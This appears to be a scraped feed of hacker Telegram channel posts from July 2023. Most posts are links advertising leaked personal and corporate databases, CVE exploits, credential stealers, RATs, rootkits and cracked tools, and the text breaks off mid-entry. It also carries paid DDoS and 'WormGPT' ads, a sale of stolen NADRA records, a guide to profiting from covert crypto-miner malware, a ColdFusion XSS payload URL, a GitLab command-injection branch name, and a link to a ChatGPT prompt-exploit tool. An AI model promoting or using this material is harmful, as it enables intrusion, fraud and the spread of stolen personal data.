🔰👾CVE-2023-3460 - Unauthorized admin access for Ultimate Member plugin POC : https://system32.ink/cve-2023-3460-unauthorized-admin-access-for-ultimate-member-plugin-poc/🌪️💥SQLiv - Massive SQL Injection Scanner Tool : https://system32.ink/sqliv-massive-sql-injection-scanner-tool/☣️🌪️Globant Argentina IT Company leak : https://system32.ink/globant-argentina-it-company-leak/⭐🔰Equipo_io Data Leak : https://system32.ink/equipo.io-data-leak/⚡🌪️550k Thailand ID-Card Data ! | 2023 : https://system32.ink/550k-thailand-id-card-data-2023/⭐👾Sanmina Corporation Leak : https://system32.ink/sanmina-corporation-leak/@crackcodes | System32.ink | Crackcodes.in
2023-07-21 08:49:13
GPT Alternative For BlackHat 🔥📢- Lightning Fast- Unlimited Characters- Privacy Focused- No Limits- Coding- Different AI Models(not free) wormgpt.co #infosec #Hacking #GPT #BugBounty #CyberSecurity #bugbountytips
2023-07-21 07:34:41
😈🍹sector Database🍹😈😈 Phone number Database. 😈 Mail Database. 😈 Citizens Database. 😈 Passport Database. 😈 Consumer Database. 😈 France Database.😈 Belgium Database.😈 Italy Database.😈 Iran Database.😈 B2B Database. 😈 Germany Database.😈 Swiss Database.😈 Poland Database.😈 Vietnam Database.😈 Sweden Database.😈 Africa Database😈 Usa Database.😈 China database 😈 Spain Database.😈 Sweden Database.😈 Greece Database.😈 Netherland Database.😈 Colombia Database😈 Usa SSN + Fullz Database😈 484 Big COMPANY Database. 😈 Ukraine Database.😈 India Database😈 Bank database 😈 Unlimited logs private 😈 Australia, china, rassia, etc (golden nearly all countries database)   Free data👇@private_sector_info
2023-07-21 01:42:22
Vps sellers contact @mynk0x00
2023-07-20 04:56:03
𝙐𝙣𝙙𝙚𝙧𝙨𝙩𝙖𝙣𝙙 𝙬𝙝𝙖𝙩 𝙞𝙨 𝙅𝙒𝙏 🧐𝙇𝙞𝙣𝙠: https://www.instagram.com/reel/Cu5_6yTtfqi/?igshid=MzRlODBiNWFlZA==
2023-07-19 14:04:45
ColdFusion XSSPOC:{{host}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(document.domain) Images
2023-07-19 11:03:08
🔰⭐Alcatraz - x64 Binary Obfuscator : https://system32.ink/alcatraz-x64-binary-obfuscator/💩💥Yunus Emre Institute Turkey Leak : https://system32.ink/yunus-emre-institute-turkey-leak/
2023-07-19 06:38:49
𝙃𝙚𝙡𝙥 𝙮𝙤𝙪 𝙩𝙤 𝙚𝙭𝙩𝙧𝙖𝙘𝙩 𝙨𝙚𝙣𝙨𝙞𝙩𝙞𝙫𝙚 𝙞𝙣𝙛𝙤𝙧𝙢𝙖𝙩𝙞𝙤𝙣 𝙛𝙧𝙤𝙢 𝙮𝙤𝙪𝙧 𝙩𝙖𝙧𝙜𝙚𝙩 𝙙𝙤𝙢𝙖𝙞𝙣𝙨😍𝙇𝙞𝙣𝙠: https://twitter.com/thecybertix/status/1681552025740541953?t=-ilNBv56tIQX7DLQ-_WbjA&s=19
2023-07-18 19:10:08
https://trickypenguin.ink/what-is-an-idor-insecure-direct-object-reference/
2023-07-18 18:27:13
Google Reverse Image Search FixGoogle lens is not too user friendly for investigations. But this tool will help you get back to the old Google Image Search.(in case of problems, upload images to Postimages.org)https://googlelens.imagesniper.eu/#osint Images
2023-07-18 16:49:35
✅ New Blog is Out 🤙https://www.cybersecuritymumbai.com/free-cyber-security-courses/
2023-07-18 15:47:05
⚡💥kasrapaper_ir Data Leak : https://system32.ink/kasrapaper.ir-data-leak/👾☣️SQL-Login-Bypass Script : https://system32.ink/sql-login-bypass-script/💥🔰ShadowForge C2 : https://system32.ink/shadowforge-c2/🌪️⭐TGSCAN : https://system32.ink/tgscan/🔰👾Metasploit Pro 4.22.1 Crack Download : https://system32.ink/metasploit-pro-4.22.1-crack-download/@Crackcodes | System32.ink | Crackcodes.in
2023-07-18 14:46:51
🔥 KRYPTON – Powerful, reliable, cheap DDoS Service!✔️ IoT Botnet for L4✔️ Private servers for L7✔️ Low prices and huge power✅ Our network consists of SPOOF/RAW/AMP mix, a lot of bypasses, game methods and guarantees High GBits/RPS.💬 PRICES / BUY Images
2023-07-18 05:47:10
350$ Bounty 😍𝘽𝙪𝙜: UNION Based SQL Injection. 𝙇𝙞𝙣𝙠: https://youtu.be/sKUdvMJ1_28
2023-07-17 16:21:46
Shodan is offering a lifetime membership upgrade for $5.00 instead of $49.00.The sale lasts until July 17 23:59 UTC:https://account.shodan.io/billing/memberI have money for buying this but I don't have any international acceptable Card... So if anyone have then after doing your payment please help us also for getting this...😶🥺Regards :- 👼@lexlegion👼Go and Grab The Opportunity Before it's gone End🌎If you Liked my Post Hit Reaction Here🔥
2023-07-17 15:27:24
The Power of OSINT: Conversations with Dheeraj Speaker - @dheerajydv19 (Founder of @OSINTAmbition)We have broadly discussed the following topics in the conversation -- What is OSINT- Use of OSINT in Cybersecurity- Use of OSINT in criminal investigations- Use of OSINT in real world- OSINT in personal life- How to get started in OSINT https://youtu.be/UMPiNU0TPjEWatch the video if you are interested in OSINT, or wanted to learn about it.Join @OSINTAmbition for more amazing talks related to OSINT and for learning about useful tools and techniques for OSINT.
2023-07-17 13:32:47
🔰🌪️TagShelf Data Leak : https://system32.ink/tagshelf-data-leak/☣️💥Luna Hotels Data Leak : https://system32.ink/luna-hotels-data-leak/⚡⭐Atherfield Medical & Skin Cancer Clinic Data Leak : https://system32.ink/atherfield-medical-skin-cancer-clinic-data-leak/💩💥Ghana National Teaching Council Database Leak 2019 : https://system32.ink/ghana-national-teaching-council-database-leak-2019/👾⚡Promptmap - Exploit ChatGpt : https://system32.ink/promptmap-exploit-chatgpt/☣️👾🔰CVE-2023-20110 Exploit | Cisco Smart Software Manager On-Prem SQL Injection : https://system32.ink/cve-2023-20110-exploit-cisco-smart-software-manager-on-prem-sql-injection/@Crackcodes | System32.ink | Crackcodes.in
2023-07-17 04:41:01
𝙊𝘼𝙪𝙩𝙝 𝙈𝙞𝙨𝙘𝙤𝙣𝙛𝙞𝙜𝙪𝙧𝙖𝙩𝙞𝙤𝙣 😎😍𝙄𝙩 𝙞𝙨 𝙧𝙚𝙖𝙡𝙡𝙮 𝙀𝙖𝙨𝙮 𝙩𝙤 𝙀𝙭𝙥𝙡𝙤𝙞𝙩 𝙩𝙝𝙞𝙨 𝙑𝙪𝙡𝙣𝙚𝙧𝙖𝙗𝙞𝙡𝙞𝙩𝙮.𝙋𝙊𝙎𝙎𝙄𝘽𝙇𝙀 𝘽𝙊𝙐𝙉𝙏𝙔: 500$𝙏𝙤𝙥𝙞𝙘 𝘾𝙤𝙫𝙚𝙧𝙚𝙙:1. What is OAUth? 2. Working of OAuth. 3. OAuth Grant Type. 4. OAuth Test cases 😍 ➡️ Account Takeover ➡️ Open Redirection ➡️ SSRF 𝙋𝙡𝙚𝙖𝙨𝙚 𝙨𝙝𝙖𝙧𝙚 𝙮𝙤𝙪𝙧 𝙑𝙞𝙚𝙬𝙨 🙏🏻𝙇𝙞𝙣𝙠:https://youtu.be/iBZhWSxu2fg
2023-07-16 11:30:25
⚡⭐Arandell Data Leak : https://system32.ink/arandell-data-leak/🔰💥Mutuelle LMP Leak : https://system32.ink/mutuelle-lmp-leak☣️💥Sweden University Uppsala Leak : https://system32.ink/sweden-university-uppsala-leak/🔰💥Guatemala Military Intelligence Directorate 2023 Leaks : https://system32.ink/guatemala-military-intelligence-directorate-2023-leaks/🌪️☣️ShowsOnSale (American concert ticket broker) Data Leak : https://system32.ink/showsonsale-american-concert-ticket-broker-data-leak/🔰👾HVNC for Cobalt Strike I Hidden Desktop BOF : https://system32.ink/hvnc-for-cobalt-strike-i-hidden-desktop-bof/💥☣️LolDriverScan : https://system32.ink/loldriverscan/👾☣️Anonymous Stealer : https://system32.ink/anonymous-stealer/@Crackcodes | System32.ink | Crackcodes.in
2023-07-15 12:45:25
☣️⭐Nvidia Corporation Leak : https://system32.ink/nvidia-corporation-leak/👾🔰Rheinmetall Defence Leak : https://system32.ink/rheinmetall-defence-leak/🌪️💩FA station Thailand Leak : https://system32.ink/fa-station-thailand-leak/💥☣️Invicti Enterprise 23.1 : https://system32.ink/invicti-enterprise-23.1-download-free/☣️🌪️CVE-2023-37582 EXPLOIT Apache RocketMQ : https://system32.ink/cve-2023-37582-exploit-apache-rocketmq/@Crackcodes | System32.ink | Crackcodes.in
2023-07-15 05:39:13
𝙒𝙝𝙖𝙩 𝙞𝙨 𝙅𝙒𝙏? 🧐🤔𝙇𝙞𝙣𝙠: https://youtube.com/shorts/Gq0y6FPvE5M?feature=share
2023-07-14 14:33:25
Report: Chinese state controlled hackers targeted Pak National Information Technology Board (NITB) to extract info about Pak & Western world relations.WLVN Analysis/Twitter
2023-07-14 14:00:17
🔰👾CVE-2023-3460 - Unauthorized admin access for Ultimate Member plugin POC : https://system32.ink/cve-2023-3460-unauthorized-admin-access-for-ultimate-member-plugin-poc/🌪️💥SQLiv - Massive SQL Injection Scanner Tool : https://system32.ink/sqliv-massive-sql-injection-scanner-tool/☣️🌪️Globant Argentina IT Company leak : https://system32.ink/globant-argentina-it-company-leak/⭐🔰Equipo_io Data Leak : https://system32.ink/equipo.io-data-leak/⚡🌪️550k Thailand ID-Card Data ! | 2023 : https://system32.ink/550k-thailand-id-card-data-2023/⭐👾Sanmina Corporation Leak : https://system32.ink/sanmina-corporation-leak/@crackcodes | System32.ink | Crackcodes.in
2023-07-14 13:58:44
None
2023-07-14 10:08:03
Payload Separation Confirmed, Chandrayaan-3 has been placed into a Precise Orbit. 🤞 🇮🇳
2023-07-14 00:37:23
https://twitter.com/ISec_Ninja/status/1679536360770682880?s=20
2023-07-13 16:49:14
https://www.crackcodes.in/2023/06/exploring-advanced-htaccess-file-attacks.html
2023-07-13 13:30:34
CrackCodes 🇮🇳 pinned «🌪️⚡250.8 Millions US Citizens Leak : https://system32.ink/250.8-millions-us-citizens-leak/ ☣️Malcat (0.9.2 - 2023) Download Free : https://system32.ink/malcat-0.9.2-2023-download-free/ 💥⚡SatIntel - OSINT Tool For Satellites : https://system32.ink/satintel…»
2023-07-13 13:22:28
Pakistan News Channel DUNYA TV dunyanews.tv For SALE.Drop your bids on Instagram DM: pkg__diviBest Bidder will be contacted on 11th August.
2023-07-13 12:39:52
🌪️⚡250.8 Millions US Citizens Leak : https://system32.ink/250.8-millions-us-citizens-leak/☣️Malcat (0.9.2 - 2023) Download Free : https://system32.ink/malcat-0.9.2-2023-download-free/💥⚡SatIntel - OSINT Tool For Satellites : https://system32.ink/satintel-osint-tool-for-satellites/💩Pakistan Ministry of Finance Leak : https://system32.ink/pakistan-ministry-of-finance-leak-2022/👾⚡CVE-2023-2255 Exploit : https://system32.ink/%e2%80%8b%e2%80%8bcve-2023-2255-exploit/☣️🌪️PoC Exploit for CVE-2023-35803 : https://system32.ink/poc-exploit-for-cve-2023-35803/@Crackcodes | System32.ink | Crackcodes.in
2023-07-13 06:05:09
CYBER DEMONS INDIA (CDI) COMMUNITY 🚩CODING RESOURCES CYBER UPDATESCDI RESOURCES CHANNEL CDI DISCUSSION GROUPCDI NOTES CHANNELCDI LIBRARY CHANNELJOIN IF YOU GUYS WANT TO STAY UPDATED TO CYBER SECURITY COURSES , HANDWRITTEN NOTES , CYBER SEC BOOKS , ROADMAPS , GITHUB REPOS , FUNNY OR TECH DISCUSSIONS , TECH SAVY PEOPLE , CLASSES , BLOGS AND CODING RESOURCES NOTEONLY SERIOUS PEOPLE JOIN THIS GROUP AND NO DISCUSSION ABOUT INSTAGRAM HACKING OR ANY KIND OF STUFF LIKE THIS .TYPE /notes FOR RESOURCES 🥰 JAY SHREE RAAM 🥰
2023-07-13 05:08:16
256 $ 𝘽𝙤𝙪𝙣𝙩𝙮 𝙤𝙣 𝘿𝙞𝙨𝙘𝙤𝙪𝙧𝙨𝙚. 😍𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Stored XSS𝙑𝙞𝙙𝙚𝙤 𝙋𝙤𝘾: https://youtu.be/mye7f0ETyHc
2023-07-12 10:19:04
🔰⭐Sunrise CBD Leak: https://system32.ink/sunrise-cbd-data-leak/ ⚡💥CVE-2023-29298 Adobe Poc: https://system32.ink/cve-2023-29298-adobe-poc/🌪️⚡PS5 Kernel Exploit: https://system32.ink/ps5-kernel-exploit/☣️Anti-kill PHP Trojan Generator : https://system32.ink/anti-kill-php-trojan-generator/@crackcodes | System32.ink | Crackcodes.in
2023-07-12 05:44:38
𝙇𝙖𝙩𝙚𝙨𝙩 𝙉𝙀𝙒𝙎 ‼️‼️𝙷𝚊𝚟𝚎 𝚢𝚘𝚞𝚛 𝚑𝚎𝚊𝚛𝚍 𝚊𝚋𝚘𝚞𝚝 𝗤𝗥 𝗝𝗔𝗖𝗞𝗜𝗡𝗚? 🤔𝙇𝙞𝙣𝙠:https://youtu.be/Hb9Iu4KrrLc
2023-07-11 12:55:56
🔰Hamer Candy Malaysian leak : https://system32.ink/hamer-candy-malaysian-leak/🔰Mituo China Leak : https://system32.ink/mituo-china-leak/🔰AdultFilmStarContent_com Leak : https://system32.ink/adultfilmstarcontent.com-leak/🔰CVE-2023-2133 Poc : https://system32.ink/cve-2023-2133-poc/🔰CVE-2023-36167 Poc : https://system32.ink/cve-2023-36167-poc/🔰CVE-2023-22906 Qubo Smart Doorbell device Exploit : https://system32.ink/cve-2023-22906-qubo-smart-doorbell-device-exploit/@crackcodes | System32.ink | Crackcodes.in
2023-07-11 11:17:17
CVE-2023-24489Citrix ShareFile RCE🔥POC exploit + parsing#citrix Images
2023-07-11 05:04:05
𝘼𝙙𝙙 𝙩𝙝𝙚𝙨𝙚 𝘿𝙤𝙢𝙖𝙞𝙣 𝙞𝙣 𝙮𝙤𝙪𝙧 𝘽𝙪𝙧𝙥𝙎𝙪𝙞𝙩𝙚 𝙩𝙤 𝙍𝙚𝙢𝙤𝙫𝙚 𝙪𝙣𝙬𝙖𝙣𝙩𝙚𝙙 𝙏𝙧𝙖𝙛𝙛𝙞𝙘 🛠️𝙇𝙞𝙣𝙠: https://twitter.com/thecybertix/status/1678628790677966850?t=QVMP6t0iPE8wL55giTr2-g&s=19
2023-07-10 15:54:34
Blackhat Money Earning💸 : PART 3Theme/Topic : Silent crypto miner campaignby @devil_anonGet crypter :- t.me/cyberhell_store/38Get miner :- t.me/cyberhell_store/56What is a silent crypto miner ❓A Silent crypto miner  is a type of malware that attackers place on the computers and devices of unwitting users, allowing them to steal computing power in order to surreptitiously mine for cryptocurrency and build efficient cryptomining schemes in order to make money.Share 🌐and promote🌐@cyberhellcommunity( small tip for those who watch our videos :- before watching any, endeavor to save the video to your media and watch directly on your device video player to improve experience and video quality. )
2023-07-10 15:38:33
💥Kramer Enterprises Leak : https://system32.ink/kramer-enterprises-leak/💥FHR Electric Data Leak : https://system32.ink/fhr-electric-data-leak/💥Manjaro LPE 0day root LPE Exploit : https://system32.ink/manjaro-lpe-0day-root-lpe-exploit/💥Rhadamanthys Stealer : https://system32.ink/rhadamanthys-stealer/
2023-07-10 11:25:12
[SELLING]NADRA official data theft of Pakistan Army and other secret organization affiliated By Pakistan ArmyPakistan’s Ministry of Interior, as well as the National Database and Registration Authority (NADRA), have both refused to take responsibility of an allegedly major data leakage comprising personal and possibly sensitive information of more than 450 million mobile users, causing uproar among members of the Pakistan Army and raising concerns about digital security.DATABASE SIZE : 70 GBNUMBER OF RECORDS : 450 MILLION+PRICE : $800PAYMENT MODE : BTCFor Buy DM : @Cypher9829 Forums Thread :https://darkforums.me/Thread-NADRA-official-data-theft-of-Pakistan-Army
2023-07-10 10:29:39
🌪️⚡Phemedrone Stealer - The best Stealer Bot : https://system32.ink/phemedrone-stealer-the-best-stealer-bot/⭐AutoCaptcha tool : https://system32.ink/autocaptcha-solve-captcha-using-ai/☣️Evil QR - Hack Using QR : https://system32.ink/evil-qr-hack-using-qr/🔰Chiemtai Mobile Vietnam Leaks : https://system32.ink/chiemtai-mobile-vietnam-leaks/🔰Playbooksports_com leak : https://system32.ink/playbooksports.com-leak/@crackcodes | Crackcodes.in | System32.ink
2023-07-10 04:43:50
𝙈𝙤𝙨𝙩 𝙄𝙂𝙉𝙊𝙍𝙀𝘿 𝙑𝙪𝙡𝙣𝙚𝙧𝙖𝙗𝙞𝙡𝙞𝙩𝙮 𝙀𝙭𝙥𝙡𝙖𝙞𝙣𝙚𝙙❗❗𝘽𝙐𝙂: Web Socket Vulnerability 🔌𝙋𝙡𝙚𝙖𝙨𝙚 𝙨𝙝𝙖𝙧𝙚 𝙮𝙤𝙪𝙧 𝙍𝙚𝙫𝙞𝙚𝙬 🙏🏻. 𝙄𝙩 𝙢𝙤𝙩𝙞𝙫𝙖𝙩𝙚𝙨 𝙢𝙚 🤓𝙇𝙞𝙣𝙠: https://youtu.be/B6oalo8nx9Y
2023-07-10 04:38:40
CYBER DEMONS INDIABECAUSE OF SOME TECHNICAL ISSUES AND SOME FIGHT BETWEEN OUR FRIENDS, WE MISTAKENLY BANNED OR REMOVED ALL MEMBERS YESTERDAY .SO GOOD NEWS, THAT DISPUTE HAS BEEN SOLVED SO YOU GUYS CAN COME AGAIN IN DISCUSSION GROUP FOR INTRESTING TALKS AND TO MEET INTERESTING PEOPLE ALSO..https://t.me/+VpXFIpZTVG1kM2Nl
2023-07-09 20:53:50
Lenskart 1 Year Gold Membership Code🔥GLPHP-ACIJ-HCLJMH-4257
2023-07-09 12:47:53
MORE DETAILS COMING SOON
2023-07-09 09:24:18
Anyone want bug hunting and owasp top 10 vulnerabilities tips so visit https://scriptjacker.in/owasp.phpYou need to first get signup then login to visit this page. Very awesome content and I bet you that you can't find it at one place on entire internet. It's free.
2023-07-09 08:33:18
https://youtu.be/sI2v5rFJ50U
2023-07-08 14:20:12
💥Kramer Enterprises Leak : https://system32.ink/kramer-enterprises-leak/💥FHR Electric Data Leak : https://system32.ink/fhr-electric-data-leak/💥Manjaro LPE 0day root LPE Exploit : https://system32.ink/manjaro-lpe-0day-root-lpe-exploit/💥Rhadamanthys Stealer : https://system32.ink/rhadamanthys-stealer/
2023-07-08 11:47:32
👑DIGITAL OCEAN WINDOWS VPS AVAILABLE👑🌐ONLY 8GB 4CORE VPS 💸PRICE :- 300/-RS✅20DAYS WARRENTY AND 1MONTH VALIDITY✅🦁VPS SERVER AND ANTIBAN SO YOU CAN DO CRACKING OR OTHER THINGS BUT NO MINNING .🤩IB :- @Darkweb_x1✅PERFOMENCE AND SPEED BETTER THEN RDP✅✈️INTERNET SPEED 1GBPS+
2023-07-08 06:17:23
Kya hai bhai ye Matha chakra gaya ye dekhkar
2023-07-07 15:34:43
CVE-2023-3269StackRot Linux kernel privilege escalation vulnerability#linux #lpe
2023-07-06 17:13:07
💥RCE in GitLab's CLI tool Attack scenario:1️⃣Attacker creates a repository. They create a branch named "@|calc".2️⃣To make the attack more convincing, they set this branch as the default branch.3️⃣Victim clones the repository on their machine.4️⃣Victim tries to create an MR using glab mr create --web5️⃣The following command is run: cmd.exe /c "start https://gitlab.com/test-user/test-repo/-/merge_requests/new?merge_request[title]=%s^&amp;merge_request[description]=%s^&amp;merge_request[source_branch]=%s^&amp;merge_request[target_branch]=@|calc^&amp;merge_request[source_project_id]=%d^&amp;merge_request[target_project_id]=%d".6️⃣The pipe character allows to break out of the URL context and launch calc. Images Images Images
2023-07-06 13:55:48
System32.ink on The maintenanceWe will be start it after 6 days
2023-07-06 13:52:39
💥GeoServer SQL Injection Vulnerability Analysis (CVE-2023-25157)SQL Injection Vulnerabilities have been found with:💾 PropertyIsLike filter, when used with a String field and any database DataStore, or with a PostGIS DataStore with encode functions enabled💾 strEndsWith function, when used with a PostGIS DataStore with encode functions enabled💾 strStartsWith function, when used with a PostGIS DataStore with encode functions enabled💾 FeatureId filter, when used with any database table having a String primary key column and when prepared statements are disabled💾 jsonArrayContains function, when used with a String or JSON field and with a PostGIS or Oracle DataStore (GeoServer 2.22.0+ only)💾 DWithin filter, when used with an Oracle DataStore🔖CVE-2023-25157 - GeoServer SQL Injection - PoCUsage:python3 CVE-2023-25157.py <URL> Images Images Images Images Images Images Images Images
2023-07-06 09:54:54
https://cyberskull.co.in/2023/07/06/google-dorking-tutorial-for-beginners/
2023-07-06 05:17:58
𝘿𝙤 𝙮𝙤𝙪 𝙠𝙣𝙤𝙬 𝙒𝙝𝙖𝙩 𝙞𝙨 " 𝘿𝙊𝙈 𝘾𝙡𝙤𝙗𝙗𝙚𝙧𝙞𝙣𝙜" ? 🤔🤔𝘾𝙝𝙚𝙘𝙠 𝙩𝙝𝙞𝙨 𝙊𝙪𝙩:https://youtube.com/shorts/rysHaowv6Bk?feature=share
2023-07-05 17:09:36
https://github.com/osintambition/Ethercscan-CLI
2023-07-05 05:38:46
𝘾𝙝𝙚𝙘𝙠𝙤𝙪𝙩 𝙉𝙚𝙬 𝙄𝘿𝙊𝙍 𝙏𝙚𝙨𝙩-𝘾𝙖𝙨𝙚𝙨𝙇𝙞𝙣𝙠:https://twitter.com/thecybertix/status/1676464147855470593?t=YLFOU7Rw4bqo2dzGQZV77w&s=19
2023-07-05 00:28:44
None
2023-07-04 18:27:16
https://trickypenguin.ink/how-to-create-a-free-rdp-server/
2023-07-04 08:13:12
CYBER DEMONS INDIA (CDI) COMMUNITY 🚩CDI RESOURCES CHANNEL CDI DISCUSSION GROUPCDI NOTES CHANNELCDI LIBRARY CHANNELJOIN IF YOU GUYS WANT TO STAY UPDATED TO CYBER SECURITY COURSES , ROADMAPS , GITHUB REPOS , FUNNY OR TECH DISCUSSIONS , TECH SAVY PEOPLE , CLASSES AND BLOGS NOTEONLY SERIOUS PEOPLE JOIN THIS GROUP AND NO DISCUSSION ABOUT INSTAGRAM HACKING OR ANY KIND OF STUFF LIKE THIS .TYPE /notes FOR RESOURCES 🥰 JAY SHREE RAAM 🥰
2023-07-03 17:42:34
We are hiring !  Information Security candidates It is a full time job at associate level based out of Pune/Mumbai/Bangalore/Gurugram. Hybrid work model. Opportunity to work with international clients.7 - 9 years of work experience in Information Security, Internal Audit, ISO 27001, Risk Management , IT Security, Systems Audit, Consulting, Network security, Quality systems auditCandidates with ISO 27001 LA, CISA ,MBA IT certificates would be preferred.Must have good communication skills.Must be familiar with Information Security domains like Policies and Procedures, VAPT, Risk Assessment, IS Audits, Network Security, Access controlKnowledge of current trends in Information Technology.Knowledge in information security assessments.Knowledge of Security requirements like ISO/IEC 27001 or SOC1, SOC2.How an Information Security Associate, you will be responsible for Client interaction for information gathering.Assisting team members in Analysing, implementing, and managing the information security for our client(s).Policy and Procedure Preparation.Involvement in information security performance reviews and internal audits of client, etc.Please share your CV to careers_csecurity.in@capgemini.comFwded as received
2023-07-03 16:17:32
Searpy - Search Engine Tookit: https://www.system32.ink/2023/07/searpy-search-engine-tookit.htmlTelegram Desktop Session Stealer : https://www.system32.ink/2023/07/telegram-desktop-session-stealer.htmlContinental Tires Middle East (continental-me.com) data leak : https://www.system32.ink/2023/07/continental-tires-middle-east.htmlCVE-2023-35719 Exploit : https://www.system32.ink/2023/07/cve-2023-35719-exploit.htmlTURKEY REFUGEE database Leak : https://www.system32.ink/2023/07/turkey-refugee-database-leak.htmlTBCommunity (British fitness website) data leak : https://www.system32.ink/2023/07/tbcommunity-british-fitness-website.htmlwebmarketpoint_it data Leak : https://www.system32.ink/2023/07/webmarketpointit-data-leak.htmlZxCDDoS layer 4 and 7 ddos with cloudflare bypass : https://www.system32.ink/2023/07/zxcddos-layer-4-and-7-with-cloudflare.htmlSMShell - SMS-based shell : https://www.system32.ink/2023/07/smshell-sms-based-shell.htmlSheikh Hazza Bin Zayed Al Nahyan office data leak : https://www.system32.ink/2023/07/sheikh-hazza-bin-zayed-al-nahyan-office.htmlOffice Of Industrial Economics data leak : https://www.system32.ink/2023/07/office-of-industrial-economics-data-leak.html
2023-07-03 12:38:06
Blackhat Money Earning💸 : PART 2Theme/Topic :- Hacking and Selling Website DatabasesForum Post on SQLI:- HereSQL Injection Tutorial :- t.me/cyber_hell_official/1585By @devil_anonWhat is a database Attack❓A database-specific threat involves the use of arbitrary non-SQL and SQL attack strings into database queries. Typically, these are queries created as an extension of web forms, or received via HTTP requests. Any database system could be vulnerable to these attacks, if developers do not adhere to secure coding practices, and if the organization does not carry out regular vulnerability testing.Share 🌐and promote🌐@cyberhellcommunity
2023-07-03 09:49:04
364.64 Gb data uploading soon Share and support mateShare link https://t.me/private_sector_infoShare fast 😍😊
2023-07-03 05:44:36
None
2023-07-03 05:14:15
𝕋𝕆ℙ𝕀ℂ: 𝙒𝙚𝙗-𝘾𝙖𝙘𝙝𝙚 𝙋𝙤𝙞𝙨𝙤𝙣𝙞𝙣𝙜. 💉💻1. How Caching Works? 2. Things to analyze during Caching3. How to Exploit 𝙒𝙚𝙗 𝘾𝙖𝙘𝙝𝙚 𝙋𝙤𝙞𝙨𝙤𝙣𝙞𝙣𝙜. 🄶🄾🄾🄳 🄽🄴🅆🅂 🄵🄾🅁 🄾🅄🅁 🄲🄾🄼🄼🅄🄽🄸🅃🅈🥳𝙄𝙣 𝙩𝙝𝙚 𝙡𝙖𝙨𝙩 𝙤𝙛 𝙑𝙞𝙙𝙚𝙤. 𝙇𝙞𝙣𝙠: https://youtu.be/sI2v5rFJ50U
2023-07-02 17:44:03
FIND MY PHONE├Apple└GoogleGEOLOGGERS├seeker├trape ├TrackUrl├Bigbro├r4ven├ngrok└iploggerTELEGRAM SPOOFING├Telegram Nearby Map├Telegram Trilateration└GeogramintADINT├Yandex├Google└Mytarget Images
2023-07-02 17:38:33
Haha Very Nice 😎No matter where you hide Indian Security Agencies will find you 🇮🇳🔥
2023-07-02 14:38:39
Jo soch rahe ho unki hi baat ho rahi hai
2023-07-02 10:00:07
https://trickypenguin.ink/godaddy-firewall-bypass-with-sql-injection-securing-your-web-applications/
2023-07-02 08:20:59
📟DataLeak:📌Asia Vital Components Leak : https://www.system32.ink/2023/06/asia-vital-components-leak.html📌poskok_info Data Leak : https://www.system32.ink/2023/06/poskokinfo-data-leak.html📌Geotecsacr Digital Marketing Agency Leak : https://www.system32.ink/2023/06/geotecsacr-digital-marketing-agency-leak.html📌DarkForum Leak : https://www.system32.ink/2023/06/darkforums-data-leak.html📌Russian Champion Tennis Club in Tomsk Leak : https://www.system32.ink/2023/06/russian-champion-tennis-club-in-tomsk.html🧮Exploits:📌Lightdash Exploit (CVE-2023-35844) : https://www.system32.ink/2023/06/lightdash-exploit-cve-2023-35844.html📌CVE-2023-33140 OneNote Exploit : https://www.system32.ink/2023/06/cve-2023-33140-onenote-exploit.html📌CVE-2023-34840 XSS POC OF angular-ui-notification : https://www.system32.ink/2023/06/cve-2023-34840-xss-poc-of-angular-ui.html⚙️Tools:📌CrackMapExec : https://www.system32.ink/2023/06/crackmapexec.html📌SAFIREFUZZ - Same-Architecture Firmware Rehosting and Fuzzing : https://www.system32.ink/2023/06/safirefuzz-same-architecture-firmware.html📌PwnDoc-ng - Pentest Report Generator : https://www.system32.ink/2023/06/pwndoc-ng-pentest-report-generator.html📌VulnX - An Intelligent Bot Auto Shell Injector that detects vulnerabilities in multiple types of Cms : https://www.system32.ink/2023/06/vulnx-intelligent-bot-auto-shell.html📌Network Signal Guru APK : https://www.system32.ink/2023/06/network-signal-guru-apk.html📌Google CTF : https://www.system32.ink/2023/06/google-ctf.html🦠Rootkit ANd RAT:📌888 RAT New Version 2023 ( 1.2.6 Full Setup ) For Lifetime : https://www.system32.ink/2023/06/888-rat-new-version-2023-126-full-setup.html📌reveng_rtkit Rootkit : https://www.system32.ink/2023/06/revengrtkit-rootkit.html
2023-07-02 00:11:04
Meet DarkBERT - AI Model revolutionizing cybersecurity, emerging from the dark recesses of the internet, trained on a massive 2.2 TB of Dark Web data. This video explores how DarkBERT, a sibling to ChatGPT, decodes the secrets, threats, and coded messages, becoming a pivotal tool in cyber threat intelligence. The power of AI is transforming the way we understand the Dark Web and boosting defenses against worldwide cyber threats with DarkBERT.
2023-07-01 18:31:05
https://www.crackcodes.in/2023/06/what-are-security-issues-in-programming.html
2023-07-01 15:34:24
🔱CVE-2023-24488 POC : https://www.system32.ink/2023/07/cve-2023-24488-poc.html🔱CVE-2023-28252 POC : https://www.system32.ink/2023/07/cve-2023-28252-poc.html🔱Sniffle - Sniffer for Bluetooth 5 and 4.x (LE) : https://www.system32.ink/2023/07/sniffle-sniffer-for-bluetooth-5-and-4x.html🔱ChromeOS pluginvm arbitrary chmod 777 : https://www.system32.ink/2023/07/chromeos-pluginvm-arbitrary-chmod-777.html🔱Akira Ransomware Decryptor Software : https://www.system32.ink/2023/07/akira-ransomware-decryptor-software.html🔱CVE-2023-27997 FortiGate SSL VPN Detector : https://www.system32.ink/2023/07/cve-2023-27997-fortigate-ssl-vpn.html🔱TomcatBackdoorPoC : https://www.system32.ink/2023/07/tomcatbackdoorpoc.html
2023-07-01 13:40:06
Say GoodBye to Struggle for Sharing File. Now Use Telegram to also share files to one who doesn't use Telegram with our new bot@tg_direct_download_botJust give it a try 😊
2023-06-30 13:49:00
🔐DATALEAKS:📌Social Security Administration USA (SSA.gov) Leak : https://www.system32.ink/2023/06/social-security-administration-usa.html📌Electrical4all (electrical4all.co.uk) UK Data Leak : https://www.system32.ink/2023/06/electrical4all-electrical4allcouk-uk.html📌AuraXR (Mexican 'extended reality' company) DATA Leak : https://www.system32.ink/2023/06/auraxr-mexican-extended-reality-company.html📌QWERT SYSTEM (South Korean POS systems) Leak : https://www.system32.ink/2023/06/qwert-system-south-korean-pos-systems.html📌Telstra MyRewards (Australian rewards/coupon service) Data Leak : https://www.system32.ink/2023/06/telstra-myrewards-australian.html📌DoctorAki (Colombian health website) Data Leak : https://www.system32.ink/2023/06/doctoraki-colombian-health-website-data.html📌NovaPay data leak : https://www.system32.ink/2023/06/novapay-data-leak.html📌3S 